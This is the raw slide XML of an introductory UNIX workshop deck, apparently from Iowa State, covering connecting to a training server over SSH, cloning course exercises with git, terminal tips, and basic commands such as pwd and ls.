              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Shome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Rebekah Starks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>John Hsieh	Ashley Zhu	Gaurav </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Kandoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Michael Zeller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1406219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0.7: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Finishing the Connection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>You may receive a message stating:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The authenticity of host “training.las.iastate.edu” can’t be established.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RSA key fingerprint is &lt;long string of gibberish&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Are you sure you want to continue connecting (yes/no)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This message is normal the first time you connect to a server, and just means that you haven’t connected to that server before. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Go ahead and type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and then hit enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>You will be prompted for your password; enter your ISU net id password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>It may not look like anything is being typed in the password field; this is a UNIX security feature to prevent anyone from seeing how long your password is.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2490116"/>
            <a:ext cx="8024954" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The authenticity of host “training.las.iastate.edu” can’t be established.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RSA key fingerprint is &lt;long string of gibberish&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Are you sure you want to continue connecting (yes/no)?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3826419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0.8: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set-up For Remaining Lessons</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>From here on out, it doesn’t matter which operating system you’re using – all commands are the same.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Enter this command (this will be all on one line):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>git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clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <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https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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github.com/cmmann/20170301-unix-basic.git</a:t>
            </a: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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This will put some exercises for you on your drive; we’ll explain what exactly this command is doing later.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="519860" y="5035367"/>
            <a:ext cx="8104280" cy="645905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1926374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0.9: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNIX Tips and Tricks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>You can recall previous commands in the terminal by hitting the up arrow key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>You can stop commands from executing by hitting the Ctrl and C keys at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If you are typing out the name of a file or folder, you can hit Tab to autofill the name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>You can see the commands you’ve run by entering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>history </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>into the terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If you have questions about any command, you can type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>man &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>commandname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>and get the manual for that command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>In UNIX, there are frequently many ways of accomplishing the same thing, but some ways are more efficient than others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3002356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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Navigating a UNIX File System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Overview:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>1.0: UNIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Command Syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1.2: Present </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Working Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1.3: List</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1.4: Change Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Exercise 1: Destination Traveling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3928666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1.0: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNIX Command Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UNIX commands will generally follow the following format:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>commandname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –option(s</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smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Options are single character flags that change the behavior of the command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Depending on the command, you might not use any options. Many options can be combined.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>–al</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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Note that UNIX is CASE SENSITIVE!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“bcbgso.txt” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is different from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“BCBGSO.txt”!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1573474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1.1:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Present Working Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825624"/>
            <a:ext cx="7886700" cy="4834255"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>What it does: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	Outputs the file path to your current location</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	(tells you where you are)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="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endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="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r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Now you try!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="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1765247" y="4242751"/>
            <a:ext cx="5364505" cy="1453511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45899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1.2: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List Directory Contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What it does:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	Lists the files and folders located in your present working </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	(tells you what all is where you are)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
